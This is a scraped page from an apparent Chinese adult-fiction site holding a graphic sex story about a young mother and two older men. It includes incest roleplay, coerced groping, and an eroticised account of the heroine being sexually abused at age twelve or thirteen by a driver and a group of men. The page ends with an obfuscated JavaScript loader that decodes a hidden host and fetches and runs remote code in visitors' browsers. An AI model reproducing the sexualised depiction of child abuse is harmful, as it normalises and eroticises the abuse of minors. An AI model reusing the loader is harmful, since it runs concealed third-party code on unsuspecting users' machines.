萨巴老伯在她耳边:「我的爱妻啊!丈夫口好干,好想渴你的奶水啊!」
姫蒂俏脸一红:「不要嘛!怎能在这里让你喝!会被人看见的,等、等下上楼妻子才让丈夫喝个饱,好吗?」

萨巴老伯吻她的粉颈:「不成,丈夫现在就要喝啦!来、在这里别人不会看到的!」

说完,他便牵着姫蒂的玉手,带她到一个转角阴暗处,让她坐草地上,解开她的衣扣,弹跳出那浑圆雪白的一对丰乳,一双粗手大力的搓揉,萨巴老伯大咀一张,便用力的吸吮着姫蒂的鲜红乳头,大量的美味奶汁,便流入了喉咙!
姫蒂俏脸通红,微微喘息,低头看着这头发花白的糟老头狎玩自己的一双乳房,还大口大口的喝着她的奶水,心里实在十分羞愧!但又奇怪地对这老头生出爱意,几乎把他当成了自己真正的丈夫!

她娇声呻吟:「噢!我的好丈夫、妻子被您舔的好舒服啊!用力、用力点吮啊!啊!又舔乳沟了!嘻、好痒呀、讨厌啊!您真顽皮!啊、啊」

萨巴老伯肥舌在她的乳房上又舔又舐,像是要把她吞下去般!

他口齿不清:「雪、雪、真美味!太美味了!好香、好软!老婆、我爱你!我真的好爱你!」

姫蒂抱住他的头颅,吻着他的白发:「老公、我也爱您!我也好爱您啊!我的宝贝丈夫!妻子的乳房好舒服!噢、太好了!」

萨巴老伯抬起头,吻她的娇唇:「好老婆、宝贝妻子!你真的愿意爱我这样子的老头吗?你愿意永远和我在一起吗?」

姫蒂虽觉羞怯,但还是甜甜的笑着:「我愿意!好丈夫、好老公!妻子可是觉得您好、威武呢。您又这么疼爱我,妻子觉得很幸福啊!老公、妻子想吻您,可以吗?」

萨巴老伯高兴的笑着,抱紧姫蒂,深深的和她热吻!二人有如情人般的唇贴唇、两舌交缠,互相喝着对方的唾液!萨巴两手轻揉着她的丰满乳房;姫蒂也隔着裤子,慢慢的爱抚他粗硬的阳具!

两人亲吻了好一会,萨巴老伯才站起来,掏出阳具,伸到姫蒂面前,嘿嘿笑的看着她!姫蒂瞧着面前那粗黑的大阳具,面颊绯红,媚目斜瞪萨巴老伯,微微甜笑,轻轻的在那大龟头和阴茎上亲吻!她伸出小舌温柔的舔舐着阴茎,慢慢的把龟头含在小嘴里,细细的品尝!再缓缓地吞吐着,像是滋味无穷!

萨巴老伯满足的呼气,扶住她的头,慢慢的抽送起来。粗大的阳具插进了姫蒂的喉头,使她面颊鼓涨,胡胡轻叫,唾液如流的沾湿了整根阴茎!

萨巴老伯低首看着自己乌黑的阳具,包裹在那湿暖的娇嫩欲滴小嘴里,感觉极度舒畅!而且塞得小嘴满满的,像是快要撑破了一样!姫蒂天使般美丽的容颜,因含着一根粗硬大阳具,以面露丝丝的痛苦难受!萨巴老伯心有不忍,无奈的松开了手。姫蒂吐出阳具,咳嗽了几声,打了他大腿一下!

姫蒂佯怒:「坏老公!这么大的阳具,塞在老婆那么小的嘴里!想弄死我吗?窒息啦!」

萨巴老伯抱住了她,捧着雪白的乳房搓揉,轻吻她的俏脸。

他嘿嘿笑:「对不起!好老婆,是丈夫不好,别生气!老公替宝贝妻子揉揉乳房赔罪好了!靠过来点,这样搓舒服么?要不要我吮吮乳头?」

姫蒂娇羞答答:「讨厌!这样子是赔罪吗?哼!坏老公,乳头不给您吮了!揑、揑一揑就好!唔、噢!揉、揉得轻一点!噢!是啦、这样才舒服嘛!喔、喔、老公啊」

萨巴老公爱抚她的美白大乳房,还吸吮着姫蒂的耳垂:「老婆大人啊!你下边好湿呢!请让丈夫的阳具放进去,好吗?老公好想和美丽的妻子做爱啊!」
姫蒂心头乱跳,迷迷糊糊的:「唔、老公,好老公!妻子也很想和您做爱啊!」
萨巴老伯扶她起来:「那好老婆快脱掉衣服,让老公好好的爱你!」

姫蒂羞愧不已,却慢慢的脱下连身裙,光脱脱的站在他面前!萨巴老伯看着那完美无瑕、诱人之极的躯体,腹部如火烧一般!萨巴老伯抓住她浑圆雪白的屁股,姫蒂柔如无骨的娇躯便坐在萨巴老伯的腿上,他向前一挺,粗壮的阴茎便狠插进那紧小的嫩滑阴道!姫蒂一双玉手搂抱着他的肥背,纤腰上上下下不断的扭动!

她如泣轻吟:「噢!老公!好硬、好粗啊!老婆阴道给您塞满啦!噢!舒服死了!抱我、妻子要您紧紧的抱着!呀、呀、好棒!太棒啦!」

萨巴老伯嗅着香气扑鼻的娇躯,看着那不住晃动的美白丰乳,便索性埋首在她胸前,深吸醉人的乳香,让双乳轻轻拍打他丑陋的油光大面,像是在按摩一般!令他身体上下也舒服无比!

姫蒂快感如潮:「受不了、舒服得受不了啦!上帝啊!谢谢您赐给我这么好的男人!让我得到他的宠爱!噢!老公、能做您的女人真好!真幸福啊!呜、您太厉害啦!我深爱的男人!噢、啊、啊、我爱您、我爱死您啦!」

萨巴老伯感动之极:「噢!你也是我最心爱的女人!我的好妻子、我也爱死你了!能和你做爱是我这一生最美妙的事!老婆、老婆啊!」

两人相视而笑,甜蜜无比!萨巴老伯吻在她的嫩唇,又再深深的亲吻起来!
下身则是紧紧结合,萨巴老伯拼命的抽插,每一下都重重的撞入了子宫!姫蒂脑如麻痺,娇躯像在云中飘荡,畅快得无以复加!好一会后,二人双双达到了高潮,萨巴老伯大量的热精灌进姫蒂的阴道里!滚烫热腾得她反白了眼,娇嫩身躺在微微的抽搐!

良久后,姫蒂已回复过来,看着腿间流出来的白精,俏脸红扑扑的!再看仍坐在草地上喘气的萨巴老伯,不禁心中怜惜!她穿回衣裙,走了过去,抱住他肥胖身躺,让他躺在自己的双腿上!

姫蒂甜丝丝:「老公慢慢休息吧!妻子陪着您!唔、每次为了要疼爱我,弄得您这么累,妻子好心痛呢!谢谢您!好丈夫!有了您之后,老婆每天都好满足!
太好啦!能有您爱我!妻子是全世界最幸福的女人!」

萨巴老伯轻抚她金黄秀发、脸庞:「老婆啊!你能不能爱怜一下这家伙啊?
他为了你,可是累的筋疲力竭呢!」他手指着自己的阳具,笑嘻嘻的瞧着姫蒂。

姫蒂可爱的笑:「这很应该呢!多谢你啊!心爱的大阳具!唔、真可怜!为了疼爱我,把你弄得这么累,辛苦你啦!」

姫蒂低下头,轻吻着布满爱液和精水的乌黑阴茎、龟头!一双玉手温柔的抚弄,还捧住在俏脸上来回磨擦!像如心爱的宝贝一样!

萨巴老伯高兴的呵呵笑:「我的好老婆、丈夫口好干,能不能给些奶水我解解渴啊?」

姫蒂又再解开衣扣,微笑:「当然可以呀!老公爱喝我的奶水,这是妻子的荣幸!何况您又吮得我很舒服啊!来、丈夫请喝吧!唔、好喝吗?慢慢来呀!另一边还有很多!」

她弯下身,乳头喂进萨巴老伯的咀里,他便如婴儿般躺卧着吸吮那美味的奶汁!

萨巴老伯咕噜咕噜的喝了一肚子,再含吮一会才吐出乳头,坐起身来。
他吻一下姫蒂俏脸:「老婆呀!你的奶水真好喝!喝得我好饱啊!」

姫蒂也吻他的鼻尖,扣回衣纽:「丈夫爱喝就好!妻子好高兴啊!老公回去吧!洗好衣服,老婆就回来。」

萨巴老伯却又搂住了她上下其手不住乱摸,他大舌头还在玉颈上舐舔着!
姫蒂痒的嘻嘻娇笑:「哎呀!讨厌!好痒啊!嘻、嘻、别揉啦!好老公,放过妻子好不好?呵、呵、不来啦!」

二人便在井边嬉闹着,萨巴老伯再狎玩了她一会才肯离去!姫蒂瞧着他的背影哭笑不得!但在洗衣服的时候,却又不禁轻抚自己的下身,不自觉的露出心满意足的甜蜜笑容!

姫蒂最近在村中找到了一份教师的工作,是由萨巴老伯的朋友哲比替她介绍的,哲比是那所学校的校工,一个秃头的猥琐老汉。他介绍姫蒂上午在学教三节课,下午就可回家,因此姫蒂早上把女儿托给村中菜贩碧芝大婶照顾,自己便来上班。

本来一切都很顺利,可是近来哲比知道姫蒂的丈夫不在后,便常常借故亲近,有时更大胆的吃她豆腐,对姫蒂毛手毛脚,开始时姫蒂非常厌恶,不胜其烦!但后来发觉哲比是个颇有趣的人,时常和她说笑,拿些小玩意哄她高兴,加上在萨巴老伯和扎卡多番的「造就」下,姫蒂已变成不太贞节的女人,所以慢慢的对哲比竟不大抗拒!

中午下课后,所有学生都回家午饭。姫蒂也都准备收拾好教具后便回家,这时忽觉有人在注视着她,转头一看,原来是哲比站在门边。姫蒂知道他又想讨便宜,也不去理他。哲比走上前来,一手搭在她屁股上抚摸!

他嘿嘿笑:「姫蒂老师,要回家了么?」

姫蒂转身轻推开她,白了哲比一眼:「废话!不回家做什么?」

哲比顺势拉住她的玉手,搂着纤腰,还在她俏脸上亲了一下:「可以和我做个爱啊!可爱的姫蒂老师!」

姫蒂啐了一口:「你想坏脑子啦!好了,快放开我!让我回去!」

哲比亳不理会,搂得更紧,还一手按在她胸前,揉起那硕大的美乳来!
他吻着姫蒂金黄秀发:「是的、我想你都想坏脑袋啦!谁叫你这么美丽漂亮,一对大乳房每天在我面前晃来晃去!妈的!真是忍不住了!今天我无论如何也要好好的玩一玩呀!」

说着,他便低头吻上姫蒂的嫩唇,姫蒂紧闭小嘴,却被哲比如蛇般的肥厚舌头,硬塞进去!他笑着贪婪地吸吮丁香小舌,喝她的唾液如玉液琼浆!姫蒂涨红了脸,被迫仰起头迎合他!

吻了良久,哲比才不舍的吐出舌头,却仍在亲她的两片香唇!

姫蒂喘着气:「好、好啦!哲比大叔、玩、够了吧!停手、住、住口啦!」
哲比淫笑着:「怎可能够呢!姫蒂老师、还有很多都还未玩呢!你乖一点顺从我,那我快一点满足了,便会让你回去!知道嘛!大乳房老师!」

姫蒂拍打他:「唔、你好下流!人家、人家不是大乳房老师!唔、讨厌、别摸我屁股!噢、也别揉我的乳房!别、别人经过会看见的!大坏蛋!」

哲比想想也对,便笑咪咪的把她拉扯出了课室,带姫蒂到一间茶水房内,关上了门!把她抱坐在一张小木枱上,立即埋首在胸前猛嗅,姫蒂美目半眯,心慌意乱,只知他已掀起自己的上衣,双手紧紧抓住了圆滑豪乳!深吁了口气,便用力吸吮着那可爱的粉红乳头,哲比肥舌技巧地在乳头上打圈、拍打、轻噬!再猛地吸吮一口,喝饮奶水。还慢慢的舔舐奶肉!姬蒂被这高等技术弄的不自觉娇呼起来!

哲比笑了笑:「姫蒂老师、舒不舒服?雪、很好吮的乳头!我用力点吮好不好!」

姫蒂抱住他的秃头:「喔、喔、嗯、嗯、舒服、你弄得我好舒服啊!噢!吮得这么用力、奶水要你喝光啦!噢、噢、哲比大叔、哲比大叔!能不能请你也吮一吮另一边乳头?你、你只玩一边,我、我有点难受!」

哲比大叔抬起头,亲亲她的俏脸:「当然可以呀!可是你叫我大叔啦!我无儿无女,你可以叫我做爸爸吗?」

姫蒂羞怯得耳根也红了:「这、这我不是你女儿了吗?那、那不就是乱伦吗?太下流、太羞耻了!噢!别、别咬!痛!爸、爸别咬女、儿的乳头嘛!呜、羞死人啦!」

哲比大叔呵呵大笑!大叫声好女儿爸爸来了,便猛力吸吮另一边的乳头!姫蒂啊的一声叫,把乳房贴在他面上,让他吮的更方便!这时二人情欲高涨,互相爱抚性器来!她摸在哲比腿间,吓了一跳!竟是庞然大物、硕大无朋!他吃吃笑着,掏出阳具,伸入裙中,贴在阴道口打圈!

姫蒂含情脉脉:「爸爸、您的阳具太大啦!等下慢慢来啊!女儿怕会吃不、呀!啊、啊、爸爸轻点!插死女儿了!噢、涨死了!噢!」

哲比大叔全挺进去,不停抽插:「好紧、好窄!好女儿太棒了!爸爸真爽啊!宝贝女儿、爸爸好喜欢你啊!」

姫蒂纤腰左右扭动,迎合着他:「噢、好舒畅、太爽快了!啊、啊、女儿也很喜欢您啊!好爸爸、心爱的好爸爸!天啊!俄罗斯的男人真棒!啊、喔、喔、不成了、高潮啦!噢!」

也许因为哲比大叔太过粗大,姫蒂这次来的好快,娇躯乱颤,阴道紧缩,便泄了出来!哲比咬紧牙关,继续卖力进出,他抓住雪白的肥臀,把她抱了起来!
姫蒂高潮后四肢无力的,正靠在哲比大叔身上,大口喘气,忽地被他抱了起来!

因体重关系,娇躯向下一沉,阴道里的大阳具,便更加深入,如顶上了肚皮!
姫蒂娇呼一声,一对玉手急忙搂着哲比大叔头颈,修长双腿紧紧环挟住他腰背!

丰满的嫩白乳房扁贴在他胸膛,哲比大叔魂飞天外,屁股如机械般挺动,大咀吮着姫蒂脸颊,嗅着她幽幽的少妇香气!

哲比大叔汗流满面,呼哧呼哧的喘气,把姫蒂放回枱上,伏在她的娇躯上!
姫蒂捧着他的头,吻去油面上的汗珠:「好厉害!爸爸、好强啊!女儿好敬佩您!爸爸先休息一下吧。唔、好父亲口渴吗?要不要喝女儿的奶水?来、让女儿喂您吧!好不好?」

姫蒂轻轻扭动,把粉红乳头塞进哲比大叔咀里,让他吸吮!哲比大叔喝着新鲜美味的奶汁,伏在柔若无骨的娇躯上,渐渐回复气力。姫蒂正享受着乳头被吸吮的畅快感,忽觉仍插在体内的大阴茎又再活动起来!

她倒抽口气,柔声:「爸爸、女儿被您插的好舒服啊!噢、真美妙!女儿好喜欢和爸爸做爱啊!好爸爸、请您用力点!噢、噢、对啊!是这样了!太好、太棒啦!啊、啊!」

姫蒂向下望去,看着那硬邦邦的大阴茎在她双腿间,急促的进进出出!爱液如流,沾湿了整根阳具、阴毛,一只粗手抓着她的屁股,另一只则在尽情的揉揑着香软雪白的豪乳!她羞怯得俏脸如红苹果般,别过头去,不敢看哲比大叔!
他见姫蒂含羞答答的,非常可爱!便在她发着热的美丽脸庞上轻吻!

哲比大叔起劲抽插:「傻瓜女儿,害羞什么?以后爸爸天天都和女儿性交(淫色淫色4567Q.c0m),天天都玩你的乳房,你就不会害懆啦!嘿、嘿!」

姫蒂娇呼呻吟:「噢、噢、不要、女儿才不要天天和您性交(淫色淫色4567Q.c0m)!女儿、会没命的!呀、呀、女儿不行啦!爸爸您插够了没有?啊、啊、女儿受不了啦!喔、喔、要命、真要命啊!」

哲比大叔此刻也差不多了,在射精前便更疯狂的狠抽猛插一轮,巨大的撞击力,弄的姫蒂头昏眼花,绷紧着娇躯,唾液不受控的流出!哲比大叔大叫一声,猛地一挺,大量滚热的精液,如箭般射在姫蒂的子宫壁上,烫得她声如哭泣,呜咽地乱叫!

哲比大叔喘了数口气,便按着姫蒂的头,把大阴茎伸到她脸前,姫蒂迷迷糊糊的小嘴微张、香舌吞吐,把龟头、阴茎上的精水、爱液舔个干干净净,连阴囊也放进嘴里吸吮!哲比大叔满意的笑着扶起她,让她穿上衣裙。

姫蒂整理散乱的头发:「女儿要回去啦。明天再见了,好爸爸、噢、又抱着干嘛?讨厌!再、让您揉揉乳房好了!噢、好乖、噢、好乖的爸爸!」

哲比大叔不舍的搂着娇躯又亲又摸的玩了一会才放开了她,姫蒂见他怪可怜的,便叹了口气,主动吻在他的大咀上,和哲比大叔亲密地吻了好一阵子,甜甜一笑地回去!

4。

今早学校休息,姫蒂起来后喂过女儿,便想去找萨巴老伯,走到他房外,忽然发现里面有一从未见过的老妇在和他聊天,而且状甚亲热。姫蒂顿时嫉妒非常,转头便走!萨巴老伯也看到了,忙找个借口,追了出来!

萨巴老伯从后追上,拉住她的玉臂,带进一间空房内。

他涎皮赖脸:「怎么啦!生什么气啊?她是我的前妻,他妈的老女人来向老子借钱罢了!」

姫蒂别过脸不去看他:「你、你跟我解释干吗?我又不是你什么人!你不用管我啊!」

萨巴老伯拉她过来,搂住她纤腰:「你是我的好妻子啊!是我最深爱的女人呀!小笨蛋!你可比她棒太多啦!我现在的老婆可是又年轻又可爱漂亮,还有着一双雪白的大乳房啊!我可是疼爱得她不得了呢!」

姫蒂听得羞怯无比,却又笑得甜丝丝的:「讨厌!谁要你疼!坏丈夫!你、你快叫她走啊!我不准她缠住你!你、你可是、我的男人!你只可碰、我一个!」
她低下头不敢看他,耳根也发红了,萨巴老伯笑呵呵的,抱得她更紧!
他亲吻姫蒂的俏脸:「我的好老婆啊!丈夫可是爱死你了!除了你我这辈子再也不碰的女人!嘿、嘿、以后也只揉我爱妻的大乳房!」

萨巴老伯笑着一双大手便按在姫蒂的胸部上,用力的搓揉起来!。

姫蒂咬住下唇:「唔、坏死了!说不了两句,又来玩妻子的乳房!噢、揉的轻点嘛!妻子、这对乳房还、还不是属于你的吗!以后你要怎样玩、都可以啦!」
萨巴老伯心花怒放,便想解她衣裳!

姫蒂却轻推开他:「等下嘛!那女人还在等你,好老公快赶她走!嘻、嘻、妻子、妻子在房里准备着等你,让你、好好的玩个饱!好吗?」

萨巴老伯欢呼一声,便飞快跑去,姫蒂也愉快的笑了笑回到房去!

没多久,萨巴老伯便心急地走进她房里,却目瞪口呆的瞧着姫蒂,因为她此时只穿着一件小背心,胸前白里透红的一对豪乳,像是要撑爆衣服而跳出来一般!
下身则盖在被窝里,似是什么也没穿!

姫蒂被他瞧的不好意思,娇嗲的向他招手:「唔、好老公你瞧够了没有?快过来嘛!妻子要你好好的疼爱啊!噢、那女人滚蛋了吗?」

萨巴老伯扑了过去,在她胸前狂嗅:「走了!我他妈的赶她了!天!老婆你真性感!」

姫蒂抱紧他的头颅:「噢!丈夫喜欢、妻子天天都这样穿、给你看!噢、老公快吮!快用力吮啊!唔、棒啊!噢、妻子的乳房被你吮的好舒服!」

萨巴老伯掀起背心,便大口吮着!喝饮那美味的乳汁!他一手伸向下,摸在姫蒂的腿间,这时她只穿一件小内裤,更已湿淋淋的!姫蒂也不客气地抓向他跨下,爱抚着那坚硬如石的大阳具!

姫蒂玉手勾住他的粗颈:「老公!妻子要喔!快给我嘛!大阳具丈夫!」
萨巴老伯见她淫意荡漾,那还忍得住!拔出阳具,她内裤也不脱了,只拉开一边,便深深的插了进去!

姫蒂满足的叫了一声,弓起背来:「啊!好厉害、好厉害啊!噢、噢、噢、我的亲亲丈夫是世界上最棒男人!太舒服啦!啊、噢、好涨啊!塞满了我的阴道、噢、老公啊!快吻我!快吻你的小妻子啊!」

萨巴老伯下身紧紧的压下去,猛然地抽插着!他深吸口气,大咀就吻了下去,肥大的舌头在姫蒂的小嘴里不停翻来覆去!还不时在她的脸上、鼻子上、眼上,如狗般舐舔着,一张天使般美丽的俏脸,湿漉漉的布满像是臭水的唾液!可是姫蒂一点也不恶心,更像是享受非常的,笑着把俏脸迎上!

姫蒂娇呼大作:「心爱的丈夫!妻子的脸你也爱舔呀!噢、你这么喜欢妻子的身体、妻子真的好幸福啊!啊、啊、啊、天啊!丈夫你太棒啦!妻子好爱你啊!
我、我的心爱的男人!」

萨巴老伯喘着气:「老婆、我也好爽啊!你、你的小穴又紧又暖,真的好好插啊!看!你的大乳房晃来晃去的,真是要命啊!爱妻啊!你小时候乳房有这么大、这么美吗?嘿、有人对你乱来过嘛?」

姫蒂怔了一怔,忽然俏脸通红!萨巴老伯知道事有跷蹊,忙追问:「噢!好老婆、怎么回事?快告诉丈夫知道!快说啊!」

姫蒂低下头,小声的:「呜、这、这是很久以前的事啦!我、我、呜、太羞耻啦!妻子说不出来啊!丈夫、原谅我啊!」

萨巴老伯轻轻的、温柔的挺进:「好老婆啊!两夫妻要坦白呀!除非你不当我是丈夫吧!否则你应该告诉我啊?」

姫蒂急忙「你当然是姫蒂的丈夫啦!我、我只爱你啊!可是这太羞耻啦!呜!」
她双手掩脸:「妻子、小时候学校离家颇远,所以爸妈便召了一辆小马车,定时的接送我,可是那驾车的坏伯伯,他、他有一天接我回家的时候,看见家里没有人便、便抱我进房里,玩、玩妻子的乳房啊!呜、老公你别生气啊!我、也不想的!」

萨巴老伯听了心头乱跳,兴奋非常:「噢、好老婆真可怜!丈夫怎会生气啊!可是他怎样玩你呢?那时候你几岁?说多点好吗?」

姫蒂享受他越见猛烈的抽插,迷迷糊糊的:「呜、那时我只有十二、三岁啊!那坏蛋抱我进我房间,放我在床上,他说我很可爱,又、又说我小小年纪乳房便这么大、每次在他面前跑过、抛来抛去的让他忍受不了啊!呜、他好下流!对嘛、丈夫?噢、你轻点、插死妻子啦!」

萨巴老伯忙点头,催促她说下去!

姫蒂羞答答的:「那、那坏人说着便脱去我的校服,用力、揉我双乳,还、还吮妻子的乳头呢!呜、他吮的好用力!我想推开他的,可是、身子麻麻的,一点力气也没有!他边吮边说、妻子的乳房好香、好嫩!他、他还舔了妻子整个乳房啊!他、还要我搓他的阳具,他的阳具好粗、好大!搓了两下,便、便射了出来!精液全射在妻子双乳上,他、他叫我用手指拈上乳房上的精液,放、放进嘴里!他、他的精液好难吃啊!吃完了、他、他就吻我!他亲了我嘴好久啊!还边亲边捧着妻子的乳房来揉玩!他揑的我的乳头好痛啊!」

萨巴老伯兴奋无比:「他妈的那混蛋以后也常常这样玩你吗?噢!我可怜的小妻子!」

姫蒂扁了扁小嘴:「好丈夫!妻子现在有了你很幸福啊!噢、我、我快不行了!那、那坏蛋以后也常常趁爸妈不在时,狎玩着我!有、有一次他、他带我到他家里,那儿有他的几个朋友呢!他把我抱坐在腿上,边和朋友玩牌,边搓揉我双乳,妻子害羞的一张脸埋在他颈项,不敢说话!他、他还解开我衣衫,当众吸吮我的、乳头!那大坏蛋、输了牌的时候,也叫、叫他的朋友吮我的乳头抵偿呢!
结果那天妻子在那五、六个人的身上转来转去,让、让他们玩我的乳房!到后来他、他们索性牌也不打了,所有人都围住了我,二、三个人在吮我乳头、舔我乳房!其他有的亲我的脸、吻我的嘴!有的还要我用手揉他们的阳具!最后、他们全射精在我身上和嘴里!」

萨巴老伯听得刺激非常,立时拼了命的狠抽猛插!喉头胡胡乱叫,像是野兽一样!姫蒂两腿围绕着他的胖腰,玉手紧紧抱住他的肥背,白嫩嫩的屁股和纤腰,不住扭动,尽量迎合着他!

萨巴老伯嘿嘿笑:「我的小老婆呀!他们欺负你的时候,你有兴奋吗?有没有谁弄得你舒服的?」

姫蒂娇嗔:「噢、讨厌!啊、啊、谁会兴奋啊!唔、妻子只有两个乳头,可是他们常常几个人抢着来吮、呀、呀、还要人家选,让谁先玩我,喔、喔、喔、羞死人啦!唔、唔、又几根阳具争着塞进妻子嘴里,啊、啊、啊、他们的阳具都很脏、很臭!呀、呀、讨厌得不得了啊!噢、噢!」

如此淫荡的说话,萨巴老伯听得兴高采烈,壮如狂牛,勇猛之极!

姫蒂娇声求饶:「喔、喔、喔、好老公!亲亲丈夫、你、你插的太深啦!噢、噢、噢、要破了!不成、你的小妻子受不了!轻点、慢点嘛!啊、啊、啊、你今天怎么、这么猛!呜、呜、呜、不成了、不成了!好丈夫啊、你要干死你的小妻子啦!呀、呀、呀!」

萨巴老伯大汗淋漓:「宝贝老婆啊!丈夫知道你以前这么可怜,常常被人欺负,所以决定一定要好好的疼疼你!让你知道现在有我在爱着你啊!所以老公插的越深、越用力,就是越爱着我的好妻子啊!」

姫蒂心里感动,吻着他的丑脸:「噢!我的好男人!你对我真好!妻子真幸运,有这么好的丈夫!你、你尽量插吧!插的用力点、深点!唔、唔、妻子要你的爱啊!好老公、我爱你!」

萨巴老伯更不客气,干个不亦乐乎,像是整个人也想钻进那小穴一样!
他咬紧牙关:「宝贝老婆!那丈夫不客气啦!今天一定要好好的满足你!让你爽快!」

姫蒂欲仙欲死,有气没力:「啊、啊、啊、啊、啊、别、别客气!啊、啊、啊、老公千万不要客气!喔、喔、喔、喔、喔、深、深一点!噢、噢、噢、噢、噢、妻子里面、也很痒!求、求你、用力点插啊、啊、啊、啊、啊、好痛快!唔、唔、唔、唔、唔、唔、亲亲丈夫、妻子要是、没了你、也不想活了、呀、呀、呀、呀、呀、呀、呀、呀、呀、呀、呀、呀!」

萨巴老伯狂冲猛撞,弄得四根床脚吱吱大响,几乎塌了下来!

他两眼一反:「不成、我要射了!老婆、请你快张开嘴!我想让你喝掉,可以吗?」

姫蒂甜甜的笑:「当然可以啊!丈夫要我怎样做都可以,噢、快来!快把大阳具放进妻子的嘴里、唔、唔、好多、唔、唔、这么多啊!唔、唔、好浓!唔、唔、满嘴、都是、啊!唔、唔、唔!」

萨巴老伯全数射在姫蒂嘴里,给她喝下!姫蒂也自然的大口含着龟头,再舐舔阴茎上的精水、爱液!清洁干净后,萨巴老伯满足地吁了口气,低头吻上她的香唇,二人相视而笑!他躺在姫蒂身上,吮着乳头,喝饮奶水解渴!

姬蒂微笑着,轻抚他的头发、颈背:「唔、累了吧!亲亲丈夫!唔、真不好意思啊!每次妻子都这么舒服,却要丈夫累成这样!对不起啊!下次老公射在妻子身体里,好吗!让妻子给你生个宝宝!」

萨巴老伯坐了起来,抱她坐在

评分
相关推荐
3.0分

3.0分 录制少妇的行为-淫妻奸情b6d

3.0分

3.0分 西方奇幻 《魔剑》第四章 《远行》2f3

3.0分

3.0分 淫荡少妇802

3.0分

3.0分 【淫荡少妇】79b

3.0分

3.0分 少妇淫事10b

3.0分

3.0分 录制少妇的行为53f

3.0分

3.0分 淫蕩的少妇4fa

3.0分

3.0分 淫荡少妇张敏之公关少妇d9b

3.0分

3.0分 偷淫艳丽少妇337

3.0分

3.0分 淫荡少妇孙倩ee2

3.0分

3.0分 从少女到淫妇231

3.0分

3.0分 淫荡少妇唐薇a5e

3.0分

3.0分 美少妇被干的不行了419

3.0分

3.0分 干了久未行房的少妇f29

3.0分

3.0分 奸淫火热的少妇abe

3.0分

3.0分 少妇在超市手淫837


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};